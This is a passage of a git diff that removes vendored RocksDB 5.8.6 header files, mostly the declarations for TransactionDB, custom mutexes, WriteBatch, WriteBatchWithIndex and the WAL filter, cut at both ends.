-  // compaction_enabled_cf_indices.
-  // 2. Open DB or Stackable DB with db_options and column_families passed to
-  // prepareWrap()
-  // Note: PrepareWrap() may change parameters, make copies before the
-  // invocation if needed.
-  // 3. Call Wrap*DB() with compaction_enabled_cf_indices in step 1 and handles
-  // of the opened DB/StackableDB in step 2
-  static void PrepareWrap(DBOptions* db_options,
-                          std::vector<ColumnFamilyDescriptor>* column_families,
-                          std::vector<size_t>* compaction_enabled_cf_indices);
-  static Status WrapDB(DB* db, const TransactionDBOptions& txn_db_options,
-                       const std::vector<size_t>& compaction_enabled_cf_indices,
-                       const std::vector<ColumnFamilyHandle*>& handles,
-                       TransactionDB** dbptr);
-  static Status WrapStackableDB(
-      StackableDB* db, const TransactionDBOptions& txn_db_options,
-      const std::vector<size_t>& compaction_enabled_cf_indices,
-      const std::vector<ColumnFamilyHandle*>& handles, TransactionDB** dbptr);
-  ~TransactionDB() override {}
-
-  // Starts a new Transaction.
-  //
-  // Caller is responsible for deleting the returned transaction when no
-  // longer needed.
-  //
-  // If old_txn is not null, BeginTransaction will reuse this Transaction
-  // handle instead of allocating a new one.  This is an optimization to avoid
-  // extra allocations when repeatedly creating transactions.
-  virtual Transaction* BeginTransaction(
-      const WriteOptions& write_options,
-      const TransactionOptions& txn_options = TransactionOptions(),
-      Transaction* old_txn = nullptr) = 0;
-
-  virtual Transaction* GetTransactionByName(const TransactionName& name) = 0;
-  virtual void GetAllPreparedTransactions(std::vector<Transaction*>* trans) = 0;
-
-  // Returns set of all locks held.
-  //
-  // The mapping is column family id -> KeyLockInfo
-  virtual std::unordered_multimap<uint32_t, KeyLockInfo>
-  GetLockStatusData() = 0;
-  virtual std::vector<DeadlockPath> GetDeadlockInfoBuffer() = 0;
-  virtual void SetDeadlockInfoBufferSize(uint32_t target_size) = 0;
-
- protected:
-  // To Create an TransactionDB, call Open()
-  explicit TransactionDB(DB* db) : StackableDB(db) {}
-
- private:
-  // No copying allowed
-  TransactionDB(const TransactionDB&);
-  void operator=(const TransactionDB&);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db_mutex.h b/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db_mutex.h
deleted file mode 100644
index df59e7a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/transaction_db_mutex.h
+++ /dev/null
@@ -1,92 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-// TransactionDBMutex and TransactionDBCondVar APIs allows applications to
-// implement custom mutexes and condition variables to be used by a
-// TransactionDB when locking keys.
-//
-// To open a TransactionDB with a custom TransactionDBMutexFactory, set
-// TransactionDBOptions.custom_mutex_factory.
-
-class TransactionDBMutex {
- public:
-  virtual ~TransactionDBMutex() {}
-
-  // Attempt to acquire lock.  Return OK on success, or other Status on failure.
-  // If returned status is OK, TransactionDB will eventually call UnLock().
-  virtual Status Lock() = 0;
-
-  // Attempt to acquire lock.  If timeout is non-negative, operation may be
-  // failed after this many microseconds.
-  // Returns OK on success,
-  //         TimedOut if timed out,
-  //         or other Status on failure.
-  // If returned status is OK, TransactionDB will eventually call UnLock().
-  virtual Status TryLockFor(int64_t timeout_time) = 0;
-
-  // Unlock Mutex that was successfully locked by Lock() or TryLockUntil()
-  virtual void UnLock() = 0;
-};
-
-class TransactionDBCondVar {
- public:
-  virtual ~TransactionDBCondVar() {}
-
-  // Block current thread until condition variable is notified by a call to
-  // Notify() or NotifyAll().  Wait() will be called with mutex locked.
-  // Returns OK if notified.
-  // Returns non-OK if TransactionDB should stop waiting and fail the operation.
-  // May return OK spuriously even if not notified.
-  virtual Status Wait(std::shared_ptr<TransactionDBMutex> mutex) = 0;
-
-  // Block current thread until condition variable is notified by a call to
-  // Notify() or NotifyAll(), or if the timeout is reached.
-  // Wait() will be called with mutex locked.
-  //
-  // If timeout is non-negative, operation should be failed after this many
-  // microseconds.
-  // If implementing a custom version of this class, the implementation may
-  // choose to ignore the timeout.
-  //
-  // Returns OK if notified.
-  // Returns TimedOut if timeout is reached.
-  // Returns other status if TransactionDB should otherwis stop waiting and
-  //  fail the operation.
-  // May return OK spuriously even if not notified.
-  virtual Status WaitFor(std::shared_ptr<TransactionDBMutex> mutex,
-                         int64_t timeout_time) = 0;
-
-  // If any threads are waiting on *this, unblock at least one of the
-  // waiting threads.
-  virtual void Notify() = 0;
-
-  // Unblocks all threads waiting on *this.
-  virtual void NotifyAll() = 0;
-};
-
-// Factory class that can allocate mutexes and condition variables.
-class TransactionDBMutexFactory {
- public:
-  // Create a TransactionDBMutex object.
-  virtual std::shared_ptr<TransactionDBMutex> AllocateMutex() = 0;
-
-  // Create a TransactionDBCondVar object.
-  virtual std::shared_ptr<TransactionDBCondVar> AllocateCondVar() = 0;
-
-  virtual ~TransactionDBMutexFactory() {}
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/utility_db.h b/thirdparty/rocksdb/include/rocksdb/utilities/utility_db.h
deleted file mode 100644
index a34a638..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/utility_db.h
+++ /dev/null
@@ -1,35 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include <vector>
-#include <string>
-
-#include "rocksdb/utilities/stackable_db.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-// Please don't use this class. It's deprecated
-class UtilityDB {
- public:
-  // This function is here only for backwards compatibility. Please use the
-  // functions defined in DBWithTTl (rocksdb/utilities/db_ttl.h)
-  // (deprecated)
-#if defined(__GNUC__) || defined(__clang__)
-  __attribute__((deprecated))
-#elif _WIN32
-   __declspec(deprecated)
-#endif
-    static Status OpenTtlDB(const Options& options,
-                                                      const std::string& name,
-                                                      StackableDB** dbptr,
-                                                      int32_t ttl = 0,
-                                                      bool read_only = false);
-};
-
-} //  namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/utilities/write_batch_with_index.h b/thirdparty/rocksdb/include/rocksdb/utilities/write_batch_with_index.h
deleted file mode 100644
index 24d8f30..0000000
--- a/thirdparty/rocksdb/include/rocksdb/utilities/write_batch_with_index.h
+++ /dev/null
@@ -1,235 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A WriteBatchWithIndex with a binary searchable index built for all the keys
-// inserted.
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch.h"
-#include "rocksdb/write_batch_base.h"
-
-namespace rocksdb {
-
-class ColumnFamilyHandle;
-class Comparator;
-class DB;
-struct ReadOptions;
-struct DBOptions;
-
-enum WriteType {
-  kPutRecord,
-  kMergeRecord,
-  kDeleteRecord,
-  kSingleDeleteRecord,
-  kDeleteRangeRecord,
-  kLogDataRecord,
-  kXIDRecord,
-};
-
-// an entry for Put, Merge, Delete, or SingleDelete entry for write batches.
-// Used in WBWIIterator.
-struct WriteEntry {
-  WriteType type;
-  Slice key;
-  Slice value;
-};
-
-// Iterator of one column family out of a WriteBatchWithIndex.
-class WBWIIterator {
- public:
-  virtual ~WBWIIterator() {}
-
-  virtual bool Valid() const = 0;
-
-  virtual void SeekToFirst() = 0;
-
-  virtual void SeekToLast() = 0;
-
-  virtual void Seek(const Slice& key) = 0;
-
-  virtual void SeekForPrev(const Slice& key) = 0;
-
-  virtual void Next() = 0;
-
-  virtual void Prev() = 0;
-
-  // the return WriteEntry is only valid until the next mutation of
-  // WriteBatchWithIndex
-  virtual WriteEntry Entry() const = 0;
-
-  virtual Status status() const = 0;
-};
-
-// A WriteBatchWithIndex with a binary searchable index built for all the keys
-// inserted.
-// In Put(), Merge() Delete(), or SingleDelete(), the same function of the
-// wrapped will be called. At the same time, indexes will be built.
-// By calling GetWriteBatch(), a user will get the WriteBatch for the data
-// they inserted, which can be used for DB::Write().
-// A user can call NewIterator() to create an iterator.
-class WriteBatchWithIndex : public WriteBatchBase {
- public:
-  // backup_index_comparator: the backup comparator used to compare keys
-  // within the same column family, if column family is not given in the
-  // interface, or we can't find a column family from the column family handle
-  // passed in, backup_index_comparator will be used for the column family.
-  // reserved_bytes: reserved bytes in underlying WriteBatch
-  // max_bytes: maximum size of underlying WriteBatch in bytes
-  // overwrite_key: if true, overwrite the key in the index when inserting
-  //                the same key as previously, so iterator will never
-  //                show two entries with the same key.
-  explicit WriteBatchWithIndex(
-      const Comparator* backup_index_comparator = BytewiseComparator(),
-      size_t reserved_bytes = 0, bool overwrite_key = false,
-      size_t max_bytes = 0);
-
-  ~WriteBatchWithIndex() override;
-
-  using WriteBatchBase::Put;
-  Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-             const Slice& value) override;
-
-  Status Put(const Slice& key, const Slice& value) override;
-
-  using WriteBatchBase::Merge;
-  Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-               const Slice& value) override;
-
-  Status Merge(const Slice& key, const Slice& value) override;
-
-  using WriteBatchBase::Delete;
-  Status Delete(ColumnFamilyHandle* column_family, const Slice& key) override;
-  Status Delete(const Slice& key) override;
-
-  using WriteBatchBase::SingleDelete;
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const Slice& key) override;
-  Status SingleDelete(const Slice& key) override;
-
-  using WriteBatchBase::DeleteRange;
-  Status DeleteRange(ColumnFamilyHandle* column_family, const Slice& begin_key,
-                     const Slice& end_key) override;
-  Status DeleteRange(const Slice& begin_key, const Slice& end_key) override;
-
-  using WriteBatchBase::PutLogData;
-  Status PutLogData(const Slice& blob) override;
-
-  using WriteBatchBase::Clear;
-  void Clear() override;
-
-  using WriteBatchBase::GetWriteBatch;
-  WriteBatch* GetWriteBatch() override;
-
-  // Create an iterator of a column family. User can call iterator.Seek() to
-  // search to the next entry of or after a key. Keys will be iterated in the
-  // order given by index_comparator. For multiple updates on the same key,
-  // each update will be returned as a separate entry, in the order of update
-  // time.
-  //
-  // The returned iterator should be deleted by the caller.
-  WBWIIterator* NewIterator(ColumnFamilyHandle* column_family);
-  // Create an iterator of the default column family.
-  WBWIIterator* NewIterator();
-
-  // Will create a new Iterator that will use WBWIIterator as a delta and
-  // base_iterator as base.
-  //
-  // This function is only supported if the WriteBatchWithIndex was
-  // constructed with overwrite_key=true.
-  //
-  // The returned iterator should be deleted by the caller.
-  // The base_iterator is now 'owned' by the returned iterator. Deleting the
-  // returned iterator will also delete the base_iterator.
-  Iterator* NewIteratorWithBase(ColumnFamilyHandle* column_family,
-                                Iterator* base_iterator);
-  // default column family
-  Iterator* NewIteratorWithBase(Iterator* base_iterator);
-
-  // Similar to DB::Get() but will only read the key from this batch.
-  // If the batch does not have enough data to resolve Merge operations,
-  // MergeInProgress status may be returned.
-  Status GetFromBatch(ColumnFamilyHandle* column_family,
-                      const DBOptions& options, const Slice& key,
-                      std::string* value);
-
-  // Similar to previous function but does not require a column_family.
-  // Note:  An InvalidArgument status will be returned if there are any Merge
-  // operators for this key.  Use previous method instead.
-  Status GetFromBatch(const DBOptions& options, const Slice& key,
-                      std::string* value) {
-    return GetFromBatch(nullptr, options, key, value);
-  }
-
-  // Similar to DB::Get() but will also read writes from this batch.
-  //
-  // This function will query both this batch and the DB and then merge
-  // the results using the DB's merge operator (if the batch contains any
-  // merge requests).
-  //
-  // Setting read_options.snapshot will affect what is read from the DB
-  // but will NOT change which keys are read from the batch (the keys in
-  // this batch do not yet belong to any snapshot and will be fetched
-  // regardless).
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           const Slice& key, std::string* value);
-
-  // An overload of the the above method that receives a PinnableSlice
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           const Slice& key, PinnableSlice* value);
-
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value);
-
-  // An overload of the the above method that receives a PinnableSlice
-  Status GetFromBatchAndDB(DB* db, const ReadOptions& read_options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           PinnableSlice* value);
-
-  // Records the state of the batch for future calls to RollbackToSavePoint().
-  // May be called multiple times to set multiple save points.
-  void SetSavePoint() override;
-
-  // Remove all entries in this batch (Put, Merge, Delete, SingleDelete,
-  // PutLogData) since the most recent call to SetSavePoint() and removes the
-  // most recent save point.
-  // If there is no previous call to SetSavePoint(), behaves the same as
-  // Clear().
-  //
-  // Calling RollbackToSavePoint invalidates any open iterators on this batch.
-  //
-  // Returns Status::OK() on success,
-  //         Status::NotFound() if no previous call to SetSavePoint(),
-  //         or other Status on corruption.
-  Status RollbackToSavePoint() override;
-
-  // Pop the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  Status PopSavePoint() override;
-
-  void SetMaxBytes(size_t max_bytes) override;
-
- private:
-  struct Rep;
-  std::unique_ptr<Rep> rep;
-};
-
-}  // namespace rocksdb
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/version.h b/thirdparty/rocksdb/include/rocksdb/version.h
deleted file mode 100644
index b48732d..0000000
--- a/thirdparty/rocksdb/include/rocksdb/version.h
+++ /dev/null
@@ -1,16 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#define ROCKSDB_MAJOR 5
-#define ROCKSDB_MINOR 8
-#define ROCKSDB_PATCH 6
-
-// Do not use these. We made the mistake of declaring macros starting with
-// double underscore. Now we have to live with our choice. We'll deprecate these
-// at some point
-#define __ROCKSDB_MAJOR__ ROCKSDB_MAJOR
-#define __ROCKSDB_MINOR__ ROCKSDB_MINOR
-#define __ROCKSDB_PATCH__ ROCKSDB_PATCH
diff --git a/thirdparty/rocksdb/include/rocksdb/wal_filter.h b/thirdparty/rocksdb/include/rocksdb/wal_filter.h
deleted file mode 100644
index 686fa49..0000000
--- a/thirdparty/rocksdb/include/rocksdb/wal_filter.h
+++ /dev/null
@@ -1,101 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include <map>
-
-namespace rocksdb {
-
-class WriteBatch;
-
-// WALFilter allows an application to inspect write-ahead-log (WAL)
-// records or modify their processing on recovery.
-// Please see the details below.
-class WalFilter {
- public:
-  enum class WalProcessingOption {
-    // Continue processing as usual
-    kContinueProcessing = 0,
-    // Ignore the current record but continue processing of log(s)
-    kIgnoreCurrentRecord = 1,
-    // Stop replay of logs and discard logs
-    // Logs won't be replayed on subsequent recovery
-    kStopReplay = 2,
-    // Corrupted record detected by filter
-    kCorruptedRecord = 3,
-    // Marker for enum count
-    kWalProcessingOptionMax = 4
-  };
-
-  virtual ~WalFilter() {}
-
-  // Provide ColumnFamily->LogNumber map to filter
-  // so that filter can determine whether a log number applies to a given 
-  // column family (i.e. that log hasn't been flushed to SST already for the
-  // column family).
-  // We also pass in name->id map as only name is known during
-  // recovery (as handles are opened post-recovery).
-  // while write batch callbacks happen in terms of column family id.
-  //
-  // @params cf_lognumber_map column_family_id to lognumber map
-  // @params cf_name_id_map   column_family_name to column_family_id map
-
-  virtual void ColumnFamilyLogNumberMap(
-    const std::map<uint32_t, uint64_t>& cf_lognumber_map,
-    const std::map<std::string, uint32_t>& cf_name_id_map) {}
-
-  // LogRecord is invoked for each log record encountered for all the logs
-  // during replay on logs on recovery. This method can be used to:
-  //  * inspect the record (using the batch parameter)
-  //  * ignoring current record
-  //    (by returning WalProcessingOption::kIgnoreCurrentRecord)
-  //  * reporting corrupted record
-  //    (by returning WalProcessingOption::kCorruptedRecord)
-  //  * stop log replay
-  //    (by returning kStop replay) - please note that this implies
-  //    discarding the logs from current record onwards.
-  //
-  // @params log_number     log_number of the current log.
-  //                        Filter might use this to determine if the log
-  //                        record is applicable to a certain column family.
-  // @params log_file_name  log file name - only for informational purposes
-  // @params batch          batch encountered in the log during recovery
-  // @params new_batch      new_batch to populate if filter wants to change
-  //                        the batch (for example to filter some records out,
-  //                        or alter some records).
-  //                        Please note that the new batch MUST NOT contain
-  //                        more records than original, else recovery would
-  //                        be failed.
-  // @params batch_changed  Whether batch was changed by the filter.
-  //                        It must be set to true if new_batch was populated,
-  //                        else new_batch has no effect.
-  // @returns               Processing option for the current record.
-  //                        Please see WalProcessingOption enum above for
-  //                        details.
-  virtual WalProcessingOption LogRecordFound(unsigned long long log_number,
-                                        const std::string& log_file_name,
-                                        const WriteBatch& batch,
-                                        WriteBatch* new_batch,
-                                        bool* batch_changed) {
-    // Default implementation falls back to older function for compatibility
-    return LogRecord(batch, new_batch, batch_changed);
-  }
-
-  // Please see the comments for LogRecord above. This function is for 
-  // compatibility only and contains a subset of parameters. 
-  // New code should use the function above.
-  virtual WalProcessingOption LogRecord(const WriteBatch& batch,
-                                        WriteBatch* new_batch,
-                                        bool* batch_changed) const {
-    return WalProcessingOption::kContinueProcessing;
-  }
-
-  // Returns a name that identifies this WAL filter.
-  // The name will be printed to LOG file on start up for diagnosis.
-  virtual const char* Name() const = 0;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/write_batch.h b/thirdparty/rocksdb/include/rocksdb/write_batch.h
deleted file mode 100644
index 336391e..0000000
--- a/thirdparty/rocksdb/include/rocksdb/write_batch.h
+++ /dev/null
@@ -1,350 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// WriteBatch holds a collection of updates to apply atomically to a DB.
-//
-// The updates are applied in the order in which they are added
-// to the WriteBatch.  For example, the value of "key" will be "v3"
-// after the following batch is written:
-//
-//    batch.Put("key", "v1");
-//    batch.Delete("key");
-//    batch.Put("key", "v2");
-//    batch.Put("key", "v3");
-//
-// Multiple threads can invoke const methods on a WriteBatch without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same WriteBatch must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_WRITE_BATCH_H_
-#define STORAGE_ROCKSDB_INCLUDE_WRITE_BATCH_H_
-
-#include <atomic>
-#include <stack>
-#include <string>
-#include <stdint.h>
-#include "rocksdb/status.h"
-#include "rocksdb/write_batch_base.h"
-
-namespace rocksdb {
-
-class Slice;
-class ColumnFamilyHandle;
-struct SavePoints;
-struct SliceParts;
-
-struct SavePoint {
-  size_t size;  // size of rep_
-  int count;    // count of elements in rep_
-  uint32_t content_flags;
-
-  SavePoint() : size(0), count(0), content_flags(0) {}
-
-  SavePoint(size_t _size, int _count, uint32_t _flags)
-      : size(_size), count(_count), content_flags(_flags) {}
-
-  void clear() {
-    size = 0;
-    count = 0;
-    content_flags = 0;
-  }
-
-  bool is_cleared() const { return (size | count | content_flags) == 0; }
-};
-
-class WriteBatch : public WriteBatchBase {
- public:
-  explicit WriteBatch(size_t reserved_bytes = 0, size_t max_bytes = 0);
-  ~WriteBatch() override;
-
-  using WriteBatchBase::Put;
-  // Store the mapping "key->value" in the database.
-  Status Put(ColumnFamilyHandle* column_family, const Slice& key,
-             const Slice& value) override;
-  Status Put(const Slice& key, const Slice& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  // Variant of Put() that gathers output like writev(2).  The key and value
-  // that will be written to the database are concatenations of arrays of
-  // slices.
-  Status Put(ColumnFamilyHandle* column_family, const SliceParts& key,
-             const SliceParts& value) override;
-  Status Put(const SliceParts& key, const SliceParts& value) override {
-    return Put(nullptr, key, value);
-  }
-
-  using WriteBatchBase::Delete;
-  // If the database contains a mapping for "key", erase it.  Else do nothing.
-  Status Delete(ColumnFamilyHandle* column_family, const Slice& key) override;
-  Status Delete(const Slice& key) override { return Delete(nullptr, key); }
-
-  // variant that takes SliceParts
-  Status Delete(ColumnFamilyHandle* column_family,
-                const SliceParts& key) override;
-  Status Delete(const SliceParts& key) override { return Delete(nullptr, key); }
-
-  using WriteBatchBase::SingleDelete;
-  // WriteBatch implementation of DB::SingleDelete().  See db.h.
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const Slice& key) override;
-  Status SingleDelete(const Slice& key) override {
-    return SingleDelete(nullptr, key);
-  }
-
-  // variant that takes SliceParts
-  Status SingleDelete(ColumnFamilyHandle* column_family,
-                      const SliceParts& key) override;
-  Status SingleDelete(const SliceParts& key) override {
-    return SingleDelete(nullptr, key);
-  }
-
-  using WriteBatchBase::DeleteRange;
-  // WriteBatch implementation of DB::DeleteRange().  See db.h.
-  Status DeleteRange(ColumnFamilyHandle* column_family, const Slice& begin_key,
-                     const Slice& end_key) override;
-  Status DeleteRange(const Slice& begin_key, const Slice& end_key) override {
-    return DeleteRange(nullptr, begin_key, end_key);
-  }
-
-  // variant that takes SliceParts
-  Status DeleteRange(ColumnFamilyHandle* column_family,
-                     const SliceParts& begin_key,
-                     const SliceParts& end_key) override;
-  Status DeleteRange(const SliceParts& begin_key,
-                     const SliceParts& end_key) override {
-    return DeleteRange(nullptr, begin_key, end_key);
-  }
-
-  using WriteBatchBase::Merge;
-  // Merge "value" with the existing value of "key" in the database.
-  // "key->merge(existing, value)"
-  Status Merge(ColumnFamilyHandle* column_family, const Slice& key,
-               const Slice& value) override;
-  Status Merge(const Slice& key, const Slice& value) override {
-    return Merge(nullptr, key, value);
-  }
-
-  // variant that takes SliceParts
-  Status Merge(ColumnFamilyHandle* column_family, const SliceParts& key,
-               const SliceParts& value) override;
-  Status Merge(const SliceParts& key, const SliceParts& value) override {
-    return Merge(nullptr, key, value);
-  }
-
-  using WriteBatchBase::PutLogData;
-  // Append a blob of arbitrary size to the records in this batch. The blob will
-  // be stored in the transaction log but not in any other file. In particular,
-  // it will not be persisted to the SST files. When iterating over this
-  // WriteBatch, WriteBatch::Handler::LogData will be called with the contents
-  // of the blob as it is encountered. Blobs, puts, deletes, and merges will be
-  // encountered in the same order in which they were inserted. The blob will
-  // NOT consume sequence number(s) and will NOT increase the count of the batch
-  //
-  // Example application: add timestamps to the transaction log for use in
-  // replication.
-  Status PutLogData(const Slice& blob) override;
-
-  using WriteBatchBase::Clear;
-  // Clear all updates buffered in this batch.
-  void Clear() override;
-
-  // Records the state of the batch for future calls to RollbackToSavePoint().
-  // May be called multiple times to set multiple save points.
-  void SetSavePoint() override;
-
-  // Remove all entries in this batch (Put, Merge, Delete, PutLogData) since the
-  // most recent call to SetSavePoint() and removes the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  Status RollbackToSavePoint() override;
-
-  // Pop the most recent save point.
-  // If there is no previous call to SetSavePoint(), Status::NotFound()
-  // will be returned.
-  // Otherwise returns Status::OK().
-  Status PopSavePoint() override;
-
-  // Support for iterating over the contents of a batch.
-  class Handler {
-   public:
-    virtual ~Handler();
-    // All handler functions in this class provide default implementations so
-    // we won't break existing clients of Handler on a source code level when
-    // adding a new member function.
-
-    // default implementation will just call Put without column family for
-    // backwards compatibility. If the column family is not default,
-    // the function is noop
-    virtual Status PutCF(uint32_t column_family_id, const Slice& key,
-                         const Slice& value) {
-      if (column_family_id == 0) {
-        // Put() historically doesn't return status. We didn't want to be
-        // backwards incompatible so we didn't change the return status
-        // (this is a public API). We do an ordinary get and return Status::OK()
-        Put(key, value);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and PutCF not implemented");
-    }
-    virtual void Put(const Slice& /*key*/, const Slice& /*value*/) {}
-
-    virtual Status DeleteCF(uint32_t column_family_id, const Slice& key) {
-      if (column_family_id == 0) {
-        Delete(key);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and DeleteCF not implemented");
-    }
-    virtual void Delete(const Slice& /*key*/) {}
-
-    virtual Status SingleDeleteCF(uint32_t column_family_id, const Slice& key) {
-      if (column_family_id == 0) {
-        SingleDelete(key);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and SingleDeleteCF not implemented");
-    }
-    virtual void SingleDelete(const Slice& /*key*/) {}
-
-    virtual Status DeleteRangeCF(uint32_t column_family_id,
-                                 const Slice& begin_key, const Slice& end_key) {
-      return Status::InvalidArgument("DeleteRangeCF not implemented");
-    }
-
-    virtual Status MergeCF(uint32_t column_family_id, const Slice& key,
-                           const Slice& value) {
-      if (column_family_id == 0) {
-        Merge(key, value);
-        return Status::OK();
-      }
-      return Status::InvalidArgument(
-          "non-default column family and MergeCF not implemented");
-    }
-    virtual void Merge(const Slice& /*key*/, const Slice& /*value*/) {}
-
-    virtual Status PutBlobIndexCF(uint32_t /*column_family_id*/,
-                                  const Slice& /*key*/,
-                                  const Slice& /*value*/) {
-      return Status::InvalidArgument("PutBlobIndexCF not implemented");
-    }
-
-    // The default implementation of LogData does nothing.
-    virtual void LogData(const Slice& blob);
-
-    virtual Status MarkBeginPrepare() {
-      return Status::InvalidArgument("MarkBeginPrepare() handler not defined.");
-    }
-
-    virtual Status MarkEndPrepare(const Slice& xid) {
-      return Status::InvalidArgument("MarkEndPrepare() handler not defined.");
-    }
-
-    virtual Status MarkRollback(const Slice& xid) {
-      return Status::InvalidArgument(
-          "MarkRollbackPrepare() handler not defined.");
-    }
-
-    virtual Status MarkCommit(const Slice& xid) {
-      return Status::InvalidArgument("MarkCommit() handler not defined.");
-    }
-
-    // Continue is called by WriteBatch::Iterate. If it returns false,
-    // iteration is halted. Otherwise, it continues iterating. The default
-    // implementation always returns true.
-    virtual bool Continue();
-  };
-  Status Iterate(Handler* handler) const;
-
-  // Retrieve the serialized version of this batch.
-  const std::string& Data() const { return rep_; }
-
-  // Retrieve data size of the batch.
-  size_t GetDataSize() const { return rep_.size(); }
-
-  // Returns the number of updates in the batch
-  int Count() const;
-
-  // Returns true if PutCF will be called during Iterate
-  bool HasPut() const;
-
-  // Returns true if DeleteCF will be called during Iterate
-  bool HasDelete() const;
-
-  // Returns true if SingleDeleteCF will be called during Iterate
-  bool HasSingleDelete() const;
-
-  // Returns true if DeleteRangeCF will be called during Iterate
-  bool HasDeleteRange() const;
-
-  // Returns true if MergeCF will be called during Iterate
-  bool HasMerge() const;
-
-  // Returns true if MarkBeginPrepare will be called during Iterate
-  bool HasBeginPrepare() const;
-
-  // Returns true if MarkEndPrepare will be called during Iterate
-  bool HasEndPrepare() const;
-
-  // Returns trie if MarkCommit will be called during Iterate
-  bool HasCommit() const;
-
-  // Returns trie if MarkRollback will be called during Iterate
-  bool HasRollback() const;
-
-  using WriteBatchBase::GetWriteBatch;
-  WriteBatch* GetWriteBatch() override { return this; }
-
-  // Constructor with a serialized string object
-  explicit WriteBatch(const std::string& rep);
-
-  WriteBatch(const WriteBatch& src);
-  WriteBatch(WriteBatch&& src);
-  WriteBatch& operator=(const WriteBatch& src);
-  WriteBatch& operator=(WriteBatch&& src);
-
-  // marks this point in the WriteBatch as the last record to
-  // be inserted into the WAL, provided the WAL is enabled
-  void MarkWalTerminationPoint();
-  const SavePoint& GetWalTerminationPoint() const { return wal_term_point_; }
-
-  void SetMaxBytes(size_t max_bytes) override { max_bytes_ = max_bytes; }
-
- private:
-  friend class WriteBatchInternal;
-  friend class LocalSavePoint;
-  SavePoints* save_points_;
-
-  // When sending a WriteBatch through WriteImpl we might want to
-  // specify that only the first x records of the batch be written to
-  // the WAL.
-  SavePoint wal_term_point_;
-
-  // For HasXYZ.  Mutable to allow lazy computation of results
-  mutable std::atomic<uint32_t> content_flags_;
-
-  // Performs deferred computation of content_flags if necessary
-  uint32_t ComputeContentFlags() const;
-
-  // Maximum size of rep_.
-  size_t max_bytes_;
-
- protected:
-  std::string rep_;  // See comment in write_batch.cc for the format of rep_
-
-  // Intentionally copyable
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_WRITE_BATCH_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/write_batch_base.h b/thirdparty/rocksdb/include/rocksdb/write_batch_base.h
deleted file mode 100644
index 3e6d011..0000000
--- a/thirdparty/rocksdb/include/rocksdb/write_batch_base.h
+++ /dev/null
@@ -1,125 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
